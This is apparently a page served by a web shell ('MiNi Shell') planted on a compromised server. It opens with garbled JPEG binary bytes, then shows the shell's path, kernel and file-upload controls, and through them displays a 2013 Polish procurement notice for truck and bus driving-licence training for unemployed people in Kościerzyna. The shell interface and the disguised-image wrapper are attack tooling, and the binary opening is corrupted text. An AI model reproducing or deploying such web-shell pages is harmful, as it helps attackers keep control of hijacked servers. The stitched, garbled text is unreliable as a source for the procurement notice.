JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130214/61116-N-2013.html

<p class="kh_header"><b>Kościerzyna: PRAWO JAZDY KATEGORII C, C+E oraz D po kategorii B</b><br>
<b>Numer ogłoszenia: 61116 - 2013; data zamieszczenia: 14.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Kościerzynie , ul. Józefa Tkaczyka 1, 83-400 Kościerzyna, woj. pomorskie, tel. 58 680 20 50, faks 58 680 20 51.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRAWO JAZDY KATEGORII C, C+E oraz D po kategorii B.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego postępowania jest zorganizowanie i przeprowadzenie usługi szkolenia:
-z jednym Wykonawcą w ramach kategorii - C,
-z jednym Wykonawcą w ramach kategorii - C+E
-z jednym Wykonawcą w ramach kategorii - D po kategorii B
Celem szkolenia jest uzyskanie przez osoby uczestniczące uprawnień do prowadzenia pojazdów w ramach prawa jazdy kategorii C, kategorii C + E oraz kategorii D od B, po zdanym uprzednio egzaminie państwowym w Wojewódzkim Ośrodku Ruchu Drogowego.
Zamówienie obejmuje zorganizowanie i przeprowadzenie szkoleń o w/w tematyce oraz przygotowanie programu i zapewnienie materiałów dydaktycznych związanych z tematyką szkolenia, a także opłacenia pierwszego podejścia do egzaminu w Wojewódzkim Ośrodku Ruchu Drogowego.
Szkolenie w ramach danej kategorii prawa jazdy (C, C+E, D po kategorii B) zostanie przeprowadzone zgodnie z obowiązującymi w tym zakresie przepisami prawa polskiego.  
Szkolenie prowadzone będzie w szczególności w oparciu o przepisy:
-ustawy z dnia 5 stycznia 2011r. o kierujących pojazdami (Dz. U. 2013r. , poz. 82)
-rozporządzenia  Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012r. w sprawie szkolenia osób ubiegających się  o uprawnienia do kierowania pojazdami, instruktorów i wykładowców ( Dz. U. 2012r., poz. 1019 )
-rozporządzenia Ministra Transportu,  Budownictwa i Gospodarki Morskiej z dnia  31 lipca 2012r. w sprawie wydawania dokumentów stwierdzających uprawnienia do kierowania pojazdami (Dz. U. 2012r., poz. 1005).
Wszystkie zajęcia muszą być przeprowadzone przez wykładowcę (instruktora). Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-lerningu, w formie eksternistycznej itp.
Wykonawcy jako profesjonaliści świadczący usługi szkolenia kierowców w ramach kursów prawo jazdy doskonale znają przepisy tychże aktów prawnych, bowiem świadcząc usługi szkolenia kierowców muszą obowiązkowo je stosować. W szczególności odnosi się to do Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r w sprawie szkolenia osób ubiegających się  o uprawnienia do kierowania pojazdami, instruktorów i wykładowców ( Dz. U poz. 1019 ), regulujących:
-program szkolenia
-liczbę godzin szkolenia w ramach danej kategorii prawa jazdy - C, C+E oraz D po kategorii B (w tym maksymalnej dziennej liczby godzin szkolenia),
-wymagania i kwalifikacje stawiane kadrze dydaktycznej szkolącej kierowców,
-wymagania w zakresie zaplecza technicznego niezbędnego do odbywania szkolenia (warunki lokalowe do zajęć teoretycznych, plac manewrowy z właściwą powierzchnią dla danej kategorii prawa jazdy, wyposażony w nawierzchnię asfaltową, betonową lub kostkową, wyposażenie dydaktyczne odpowiadające obowiązującemu stanowi prawnemu i poziomowi techniki),
-wymagania w zakresie sprzętu na którym szkolić się mają osoby chcące uzyskać uprawnienia do kierowania pojazdami (zgodnie z przepisami co najmniej jeden pojazd w zakresie każdej z kategorii prawa jazdy określonej w zaświadczeniu o wpisie do rejestru działalności regulowanej będącej zakresem szkolenia, dopuszczony do ruchu, przystosowany do nauki jazdy, spełniający wymagania określone w przepisach w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia).
2. Przewidywana ilość osób podlegających szkoleniu:
Zamawiający przewiduje objąć szkoleniem:
a)prawo jazdy kategorii C- 15 osób bezrobotnych, 
b)prawo jazdy kategorii C+E- 10 osób bezrobotnych,
c)prawo jazdy kategorii D po kategorii B- 5 osób bezrobotnych.
Ukończenie szkolenia zostanie potwierdzone stosownym zaświadczeniem, zgodnie  z w/w przepisami. 
3. W ramach szkolenia Wykonawca ponosi również koszty:
a)pierwszego podejścia absolwenta kursu do egzaminu państwowego,
b)koszt egzaminu wewnętrznego przeprowadzanego u Wykonawcy, materiałów szkoleniowych - literaturę wspomagającą tematykę szkolenia (książka, podręcznik), płyta CD z przykładowymi testami, materiały do notatek np. zeszyt lub notatnik, teczkę oraz długopis.
Tytuł książki/podręcznika wraz z ich autorami oraz wydawnictwo i rok wydania, a także pozostałe dane dotyczące materiałów dydaktycznych, które zostaną przekazane na własność każdemu uczestnikowi, a także te które będą wykorzystywane w trakcie szkolenia należy (podać w załączniku 10 do SIWZ). Dodatkowymi materiałami dydaktycznymi mogą być: skrypty, płyty CD lub ksero dotyczące przedmiotu zamówienia. Wszelkie przekazywane materiały na własność muszą być nowe, nieużywane, adekwatne do treści szkolenia, z obowiązującym stanem prawnym. 
Powyższe koszty powinny być wkalkulowane w cenę oferty - załącznik nr 11 do SIWS.
4. Wykonawca nie ujmuje w kalkulacji kosztów:
a)ubezpieczenia, osób wskazanych przez Zamawiającego, od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem. Ubezpieczeniu będą podlegały tylko osoby nie posiadające prawa do stypendium z tytułu szkolenia, osoby które w trakcie szkolenia podejmą zatrudnienie, inną pracę zarobkową lub działalność gospodarczą. Zamawiający na obecnym etapie przeprowadzania postępowania nie jest w stanie stwierdzić, czy takie osoby będą brały udział w szkoleniu. Dlatego też Zamawiający dokona refundacji ewentualnie poniesionych przez wykonawcę kosztów ubezpieczenia od następstw nieszczęśliwych wypadków na podstawie polisy ubezpieczeniowej i wystawionej przez niego faktury/rachunku,
b)niezbędnych do szkolenia badań lekarskich i psychologicznych.
5.Catering: nie wymagany 
6. a)Prawo jazdy kategorii C- 15 osób bezrobotnych -dokładny termin rozpoczęcia szkolenia zostanie wyznaczony według zapotrzebowania Zamawiającego, jednak nie szybciej niż 18.03.2013r. i nie później niż 08.04.2013r. Szkolenie zakończy się w przeciągu maksymalnie 35 dni od daty jego rozpoczęcia, jednak nie później niż 25.05.2013r.
b)Prawo jazdy kategorii C+E- 10 osób bezrobotnych rozpocznie się w lipcu 2013r., jednak nie później 31.07.2013r. (w ofercie należy określić dokładny termin rozpoczęcia i zakończenia  szkolenia). Szkolenie zakończy się w przeciągu maksymalnie 35 dni od daty jego rozpoczęcia.
c)Prawo jazdy kategorii D po kategorii B- 5 osób bezrobotnych-  dokładny termin rozpoczęcia szkolenia zostanie wyznaczony według zapotrzebowania Zamawiającego, jednak nie szybciej niż 18.03.2013r. i nie później niż 08.04.2013r. Szkolenie zakończy się w przeciągu maksymalnie 50 dni od daty jego rozpoczęcia, jednak nie później niż 15.06.2013r.
jednak nie szybciej niż 18.03.2013r. i nie później niż 08.04.2013r. Szkolenie zakończy się w przeciągu maksymalnie 50 dni od daty jego rozpoczęcia, jednak nie później niż 15.06.2013r.
7.Zajęcia teoretyczne dla uczestników szkolenia muszą odbywać się w dni robocze od poniedziałku do piątku, w godzinach między 8:00 a 17:00, minimum 5 godzin dziennie. Natomiast zajęcia praktyczne mogą odbywać się od poniedziałku do soboty z wyłączeniem niedziel i dni świątecznych.
8.Godzina szkolenia teoretycznego równa się godzinie zegarowej, czyli 60 minut  i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut - długość przerw jest ustalana w sposób  elastyczny przez Wykonawcę.  Natomiast zajęcia praktyczne liczą  pełną godzinę zegarową, czyli 60 minut. 
9. Zajęcia teoretyczne i praktyczne mogą się odbywać na terenie miasta Kościerzyna. Jeśli szkolenie będzie odbywało się poza terenem Kościerzyny, Wykonawca zobowiązany będzie do przewiezienia osób bezrobotnych z Kościerzyny do miejsca prowadzenia zajęć i z powrotem na koszt Wykonawcy.
10. Zamawiający żąda, aby Wykonawca w swojej ofercie wskazał miejsce/a w którym/ch będą odbywać się zajęcia teoretyczne i praktyczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (j.t. Dz. U. 2010r. Nr 113. poz. 759 ze zm.)</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Oświadczenie o posiadaniu aktualnego wpisu do rejestru przedsiębiorców (załącznik nr 3 do SIWZ); 
b)Oświadczenie o posiadaniu aktualnego wpisu do rejestru instytucji szkoleniowych (załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz zrealizowanych przez Wykonawcę co najmniej: 15 szkoleń indywidualnych w okresie 3 ostatnich lat (jeśli okres prowadzenia działalności jest krótszy-w danym okresie) lub jednego szkolenia grupowego dla co najmniej pięcioosobowej grupy, z wykorzystaniem wzoru -Załącznik nr  7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)wykaz ilości i jakości pomieszczeń oraz placów manewrowych, planowanych do wykorzystania dla celów szkolenia - załącznik nr 9 do SIWZ,
b) Wykaz sprzętu i pomocy dydaktycznych, którymi dysponuje Wykonawca dla celów szkolenia - załącznik nr 10 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz kadry dydaktycznej , w tym instruktorów zajęć praktycznych  wraz z informacjami na   temat ich  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia oraz informacji o podstawie dysponowania tymi osobami , z wykorzystaniem wzoru - Załącznik nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej niezbędnej do realizacji danego zamówienia, do oferty należy dołączyć załącznik nr 1 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zawarta umowa może zostać zmieniona, jeśli konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne lub neutralne dla zamawiającego. W szczególności zmiany te mogą dotyczyć terminu wykonania umowy, ilości osób szkolonych nazwy lub siedziby wykonawcy lub nieistotnych warunków umowy, zmiany harmonogramu, zmiany programu zgodnie z obowiązującymi przepisami na dzień rozpoczęcia szkolenia, zmiany wykładowców (nowi wykładowcy muszą spełniać wymagania określone w SIWZ), zmiany sali dydaktycznej lub miejsca zajęć praktycznych, placów manewrowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.koscierzyna.ibip.pl/public/ oraz www.pup.koscierzyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Kościerzynie.
Adres siedziby: ul. Tkaczyka 1,83-400 Kościerzyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego pok. 21, II piętro, ul. Tkaczyka 1, 83 - 400 Kościerzyna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prawo jazdy kategorii C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prawo jazdy kategorii C dla 15 osób bezrobotnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prawo jazdy kategorii C+E.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prawo jazdy kategorii C+E dla 10 osób bezrobotnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prawo jazdy kategorii D po kategorii B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prawo jazdy kategorii D po kategorii B dla 5 osób bezrobotnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com